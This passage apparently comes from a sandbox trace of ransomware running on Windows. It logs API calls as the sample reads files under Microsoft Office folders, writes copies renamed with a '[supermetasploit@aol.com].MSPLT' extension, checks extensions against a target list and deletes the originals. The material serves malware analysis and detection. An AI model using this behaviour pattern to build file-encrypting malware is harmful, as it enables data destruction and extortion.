lpNewFilePointer=0x0) returned 1 [0183.947] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aefec0 | out: lpNewFilePointer=0x0) returned 1 [0183.947] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifestLoc.en-us.xml.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifestloc.en-us.xml.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x378 [0183.948] GetLastError () returned 0x0 [0183.948] ReadFile (in: hFile=0x384, lpBuffer=0x2fc7020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2aefecc, lpOverlapped=0x0 | out: lpBuffer=0x2fc7020*, lpNumberOfBytesRead=0x2aefecc*=0x2667, lpOverlapped=0x0) returned 1 [0183.950] WriteFile (in: hFile=0x378, lpBuffer=0x2fc7020*, nNumberOfBytesToWrite=0x2670, lpNumberOfBytesWritten=0x2aefc94, lpOverlapped=0x0 | out: lpBuffer=0x2fc7020*, lpNumberOfBytesWritten=0x2aefc94*=0x2670, lpOverlapped=0x0) returned 1 [0183.951] ReadFile (in: hFile=0x384, lpBuffer=0x2fc7020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2aefecc, lpOverlapped=0x0 | out: lpBuffer=0x2fc7020*, lpNumberOfBytesRead=0x2aefecc*=0x0, lpOverlapped=0x0) returned 1 [0183.951] WriteFile (in: hFile=0x378, lpBuffer=0x2fc7020*, nNumberOfBytesToWrite=0x106, lpNumberOfBytesWritten=0x2aefc94, lpOverlapped=0x0 | out: lpBuffer=0x2fc7020*, lpNumberOfBytesWritten=0x2aefc94*=0x106, lpOverlapped=0x0) returned 1 [0183.951] SetEndOfFile (hFile=0x378) returned 1 [0183.952] CloseHandle (hObject=0x378) returned 1 [0183.956] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aefec0 | out: lpNewFilePointer=0x0) returned 1 [0183.956] SetEndOfFile (hFile=0x384) returned 1 [0183.957] CloseHandle (hObject=0x384) returned 1 [0183.957] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifestLoc.en-us.xml.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x220) returned 1 [0183.958] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifestLoc.en-us.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifestloc.en-us.xml")) returned 1 [0183.958] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifestLoc.en-us.xml") returned 76 [0183.958] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifestLoc.en-us.xml") returned 76 [0183.958] lstrlenW (lpString=".doc") returned 4 [0183.958] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0183.958] lstrlenW (lpString=".docx") returned 5 [0183.958] lstrcmpiW (lpString1=".docx", lpString2="s.xml") returned -1 [0183.958] lstrlenW (lpString=".pdf") returned 4 [0183.958] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0183.958] lstrlenW (lpString=".xls") returned 4 [0183.958] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0183.959] lstrlenW (lpString=".xlsx") returned 5 [0183.959] lstrcmpiW (lpString1=".xlsx", lpString2="s.xml") returned -1 [0183.959] lstrlenW (lpString=".ppt") returned 4 [0183.959] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0183.959] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifestLoc.en-us.xml") returned 76 [0183.959] lstrlenW (lpString=".zip") returned 4 [0183.959] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0183.959] lstrlenW (lpString=".rar") returned 4 [0183.959] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0183.959] lstrlenW (lpString=".bz2") returned 4 [0183.959] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0183.959] lstrlenW (lpString=".7z") returned 3 [0183.959] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0183.959] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifestLoc.en-us.xml") returned 76 [0183.959] lstrlenW (lpString=".dbf") returned 4 [0183.959] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0183.959] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifestLoc.en-us.xml") returned 76 [0183.959] lstrlenW (lpString=".1cd") returned 4 [0183.959] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0183.959] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifestLoc.en-us.xml") returned 76 [0183.959] lstrlenW (lpString=".jpg") returned 4 [0183.959] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0183.959] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifestLoc.en-us.xml") returned 76 [0183.959] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifestLoc.en-us.xml") returned 76 [0183.959] lstrlenW (lpString=".doc") returned 4 [0183.959] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0183.959] lstrlenW (lpString=".docx") returned 5 [0183.959] lstrcmpiW (lpString1=".docx", lpString2="s.xml") returned -1 [0183.959] lstrlenW (lpString=".pdf") returned 4 [0183.959] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0183.959] lstrlenW (lpString=".xls") returned 4 [0183.959] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0183.959] lstrlenW (lpString=".xlsx") returned 5 [0183.959] lstrcmpiW (lpString1=".xlsx", lpString2="s.xml") returned -1 [0183.960] lstrlenW (lpString=".ppt") returned 4 [0183.960] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0183.960] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifestLoc.en-us.xml") returned 76 [0183.960] lstrlenW (lpString=".zip") returned 4 [0183.960] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0183.960] lstrlenW (lpString=".rar") returned 4 [0183.960] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0183.960] lstrlenW (lpString=".bz2") returned 4 [0183.960] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0183.960] lstrlenW (lpString=".7z") returned 3 [0183.960] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0183.960] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifestLoc.en-us.xml") returned 76 [0183.960] lstrlenW (lpString=".dbf") returned 4 [0183.960] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0183.960] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifestLoc.en-us.xml") returned 76 [0183.960] lstrlenW (lpString=".1cd") returned 4 [0183.960] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0183.960] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifestLoc.en-us.xml") returned 76 [0183.960] lstrlenW (lpString=".jpg") returned 4 [0183.960] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0183.960] lstrcmpiW (lpString1=".xml", lpString2=".MSPLT") returned 1 [0183.960] lstrlenW (lpString="AuthoredExtensions.xml") returned 22 [0183.960] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AuthoredExtensions.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\authoredextensions.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384 [0183.961] GetFileSizeEx (in: hFile=0x384, lpFileSize=0x2aeff14 | out: lpFileSize=0x2aeff14*=373) returned 1 [0183.961] CloseHandle (hObject=0x384) returned 1 [0183.961] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AuthoredExtensions.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\authoredextensions.xml")) returned 0x220 [0183.961] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AuthoredExtensions.xml.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\authoredextensions.xml.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0183.961] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AuthoredExtensions.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\authoredextensions.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384 [0183.961] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aefec0 | out: lpNewFilePointer=0x0) returned 1 [0183.961] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aefec0 | out: lpNewFilePointer=0x0) returned 1 [0183.961] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AuthoredExtensions.xml.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\authoredextensions.xml.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x378 [0183.962] GetLastError () returned 0x0 [0183.962] ReadFile (in: hFile=0x384, lpBuffer=0x2fc7020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2aefecc, lpOverlapped=0x0 | out: lpBuffer=0x2fc7020*, lpNumberOfBytesRead=0x2aefecc*=0x175, lpOverlapped=0x0) returned 1 [0184.340] WriteFile (in: hFile=0x378, lpBuffer=0x2fc7020*, nNumberOfBytesToWrite=0x180, lpNumberOfBytesWritten=0x2aefc94, lpOverlapped=0x0 | out: lpBuffer=0x2fc7020*, lpNumberOfBytesWritten=0x2aefc94*=0x180, lpOverlapped=0x0) returned 1 [0184.342] ReadFile (in: hFile=0x384, lpBuffer=0x2fc7020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2aefecc, lpOverlapped=0x0 | out: lpBuffer=0x2fc7020*, lpNumberOfBytesRead=0x2aefecc*=0x0, lpOverlapped=0x0) returned 1 [0184.342] WriteFile (in: hFile=0x378, lpBuffer=0x2fc7020*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2aefc94, lpOverlapped=0x0 | out: lpBuffer=0x2fc7020*, lpNumberOfBytesWritten=0x2aefc94*=0x100, lpOverlapped=0x0) returned 1 [0184.344] SetEndOfFile (hFile=0x378) returned 1 [0184.345] CloseHandle (hObject=0x378) returned 1 [0184.352] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aefec0 | out: lpNewFilePointer=0x0) returned 1 [0184.352] SetEndOfFile (hFile=0x384) returned 1 [0184.352] CloseHandle (hObject=0x384) returned 1 [0184.353] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AuthoredExtensions.xml.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x220) returned 1 [0184.353] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AuthoredExtensions.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\authoredextensions.xml")) returned 1 [0184.353] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AuthoredExtensions.xml") returned 73 [0184.353] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AuthoredExtensions.xml") returned 73 [0184.353] lstrlenW (lpString=".doc") returned 4 [0184.353] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0184.353] lstrlenW (lpString=".docx") returned 5 [0184.353] lstrcmpiW (lpString1=".docx", lpString2="s.xml") returned -1 [0184.353] lstrlenW (lpString=".pdf") returned 4 [0184.353] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0184.354] lstrlenW (lpString=".xls") returned 4 [0184.354] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0184.354] lstrlenW (lpString=".xlsx") returned 5 [0184.354] lstrcmpiW (lpString1=".xlsx", lpString2="s.xml") returned -1 [0184.354] lstrlenW (lpString=".ppt") returned 4 [0184.354] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0184.354] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AuthoredExtensions.xml") returned 73 [0184.354] lstrlenW (lpString=".zip") returned 4 [0184.354] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0184.354] lstrlenW (lpString=".rar") returned 4 [0184.354] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0184.354] lstrlenW (lpString=".bz2") returned 4 [0184.354] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0184.354] lstrlenW (lpString=".7z") returned 3 [0184.354] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0184.354] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AuthoredExtensions.xml") returned 73 [0184.354] lstrlenW (lpString=".dbf") returned 4 [0184.354] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0184.354] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AuthoredExtensions.xml") returned 73 [0184.354] lstrlenW (lpString=".1cd") returned 4 [0184.354] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0184.354] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AuthoredExtensions.xml") returned 73 [0184.354] lstrlenW (lpString=".jpg") returned 4 [0184.354] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0184.354] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AuthoredExtensions.xml") returned 73 [0184.354] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AuthoredExtensions.xml") returned 73 [0184.354] lstrlenW (lpString=".doc") returned 4 [0184.354] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0184.354] lstrlenW (lpString=".docx") returned 5 [0184.354] lstrcmpiW (lpString1=".docx", lpString2="s.xml") returned -1 [0184.354] lstrlenW (lpString=".pdf") returned 4 [0184.354] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0184.354] lstrlenW (lpString=".xls") returned 4 [0184.354] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0184.355] lstrlenW (lpString=".xlsx") returned 5 [0184.355] lstrcmpiW (lpString1=".xlsx", lpString2="s.xml") returned -1 [0184.355] lstrlenW (lpString=".ppt") returned 4 [0184.355] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0184.355] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AuthoredExtensions.xml") returned 73 [0184.355] lstrlenW (lpString=".zip") returned 4 [0184.355] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0184.355] lstrlenW (lpString=".rar") returned 4 [0184.355] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0184.355] lstrlenW (lpString=".bz2") returned 4 [0184.355] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0184.355] lstrlenW (lpString=".7z") returned 3 [0184.355] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0184.355] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AuthoredExtensions.xml") returned 73 [0184.355] lstrlenW (lpString=".dbf") returned 4 [0184.355] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0184.355] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AuthoredExtensions.xml") returned 73 [0184.355] lstrlenW (lpString=".1cd") returned 4 [0184.355] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0184.355] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AuthoredExtensions.xml") returned 73 [0184.355] lstrlenW (lpString=".jpg") returned 4 [0184.355] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0184.355] lstrcmpiW (lpString1=".GIF", lpString2=".MSPLT") returned -1 [0184.355] lstrlenW (lpString="AG00021_.GIF") returned 12 [0184.355] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00021_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00021_.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384 [0184.356] GetFileSizeEx (in: hFile=0x384, lpFileSize=0x2aeff14 | out: lpFileSize=0x2aeff14*=14873) returned 1 [0184.356] CloseHandle (hObject=0x384) returned 1 [0184.356] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00021_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00021_.gif")) returned 0x220 [0184.356] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00021_.GIF.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00021_.gif.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0184.356] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00021_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00021_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384 [0184.356] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aefec0 | out: lpNewFilePointer=0x0) returned 1 [0184.356] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aefec0 | out: lpNewFilePointer=0x0) returned 1 [0184.356] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00021_.GIF.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00021_.gif.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x378 [0184.357] GetLastError () returned 0x0 [0184.357] ReadFile (in: hFile=0x384, lpBuffer=0x2fc7020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2aefecc, lpOverlapped=0x0 | out: lpBuffer=0x2fc7020*, lpNumberOfBytesRead=0x2aefecc*=0x3a19, lpOverlapped=0x0) returned 1 [0184.359] WriteFile (in: hFile=0x378, lpBuffer=0x2fc7020*, nNumberOfBytesToWrite=0x3a20, lpNumberOfBytesWritten=0x2aefc94, lpOverlapped=0x0 | out: lpBuffer=0x2fc7020*, lpNumberOfBytesWritten=0x2aefc94*=0x3a20, lpOverlapped=0x0) returned 1 [0184.360] ReadFile (in: hFile=0x384, lpBuffer=0x2fc7020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2aefecc, lpOverlapped=0x0 | out: lpBuffer=0x2fc7020*, lpNumberOfBytesRead=0x2aefecc*=0x0, lpOverlapped=0x0) returned 1 [0184.360] WriteFile (in: hFile=0x378, lpBuffer=0x2fc7020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2aefc94, lpOverlapped=0x0 | out: lpBuffer=0x2fc7020*, lpNumberOfBytesWritten=0x2aefc94*=0xec, lpOverlapped=0x0) returned 1 [0184.360] SetEndOfFile (hFile=0x378) returned 1 [0184.360] CloseHandle (hObject=0x378) returned 1 [0184.363] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aefec0 | out: lpNewFilePointer=0x0) returned 1 [0184.364] SetEndOfFile (hFile=0x384) returned 1 [0184.365] CloseHandle (hObject=0x384) returned 1 [0184.365] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00021_.GIF.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x220) returned 1 [0184.365] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00021_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00021_.gif")) returned 1 [0184.366] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00021_.GIF") returned 68 [0184.366] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00021_.GIF") returned 68 [0184.366] lstrlenW (lpString=".doc") returned 4 [0184.366] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0184.366] lstrlenW (lpString=".docx") returned 5 [0184.366] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1 [0184.366] lstrlenW (lpString=".pdf") returned 4 [0184.366] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0184.366] lstrlenW (lpString=".xls") returned 4 [0184.366] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0184.366] lstrlenW (lpString=".xlsx") returned 5 [0184.366] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1 [0184.366] lstrlenW (lpString=".ppt") returned 4 [0184.366] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0184.366] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00021_.GIF") returned 68 [0184.366] lstrlenW (lpString=".zip") returned 4 [0184.366] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0184.366] lstrlenW (lpString=".rar") returned 4 [0184.366] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0184.366] lstrlenW (lpString=".bz2") returned 4 [0184.366] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0184.366] lstrlenW (lpString=".7z") returned 3 [0184.367] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0184.367] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00021_.GIF") returned 68 [0184.367] lstrlenW (lpString=".dbf") returned 4 [0184.367] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0184.367] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00021_.GIF") returned 68 [0184.367] lstrlenW (lpString=".1cd") returned 4 [0184.367] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0184.367] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00021_.GIF") returned 68 [0184.367] lstrlenW (lpString=".jpg") returned 4 [0184.367] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0184.367] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00021_.GIF") returned 68 [0184.367] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00021_.GIF") returned 68 [0184.367] lstrlenW (lpString=".doc") returned 4 [0184.368] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0184.368] lstrlenW (lpString=".docx") returned 5 [0184.368] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1 [0184.368] lstrlenW (lpString=".pdf") returned 4 [0184.368] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0184.368] lstrlenW (lpString=".xls") returned 4 [0184.368] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0184.368] lstrlenW (lpString=".xlsx") returned 5 [0184.368] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1 [0184.368] lstrlenW (lpString=".ppt") returned 4 [0184.368] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0184.368] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00021_.GIF") returned 68 [0184.368] lstrlenW (lpString=".zip") returned 4 [0184.368] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0184.368] lstrlenW (lpString=".rar") returned 4 [0184.368] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0184.368] lstrlenW (lpString=".bz2") returned 4 [0184.368] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0184.368] lstrlenW (lpString=".7z") returned 3 [0184.368] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0184.368] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00021_.GIF") returned 68 [0184.368] lstrlenW (lpString=".dbf") returned 4 [0184.368] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0184.368] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00021_.GIF") returned 68 [0184.368] lstrlenW (lpString=".1cd") returned 4 [0184.368] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0184.368] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00021_.GIF") returned 68 [0184.368] lstrlenW (lpString=".jpg") returned 4 [0184.368] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0184.369] lstrcmpiW (lpString1=".GIF", lpString2=".MSPLT") returned -1 [0184.369] lstrlenW (lpString="AG00037_.GIF") returned 12 [0184.369] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00037_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00037_.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384 [0184.370] GetFileSizeEx (in: hFile=0x384, lpFileSize=0x2aeff14 | out: lpFileSize=0x2aeff14*=6684) returned 1 [0184.370] CloseHandle (hObject=0x384) returned 1 [0184.370] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00037_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00037_.gif")) returned 0x220 [0184.370] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00037_.GIF.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00037_.gif.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0184.370] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00037_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00037_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384 [0184.370] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aefec0 | out: lpNewFilePointer=0x0) returned 1 [0184.370] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aefec0 | out: lpNewFilePointer=0x0) returned 1 [0184.370] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00037_.GIF.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00037_.gif.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x378 [0184.371] GetLastError () returned 0x0 [0184.371] ReadFile (in: hFile=0x384, lpBuffer=0x2fc7020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2aefecc, lpOverlapped=0x0 | out: lpBuffer=0x2fc7020*, 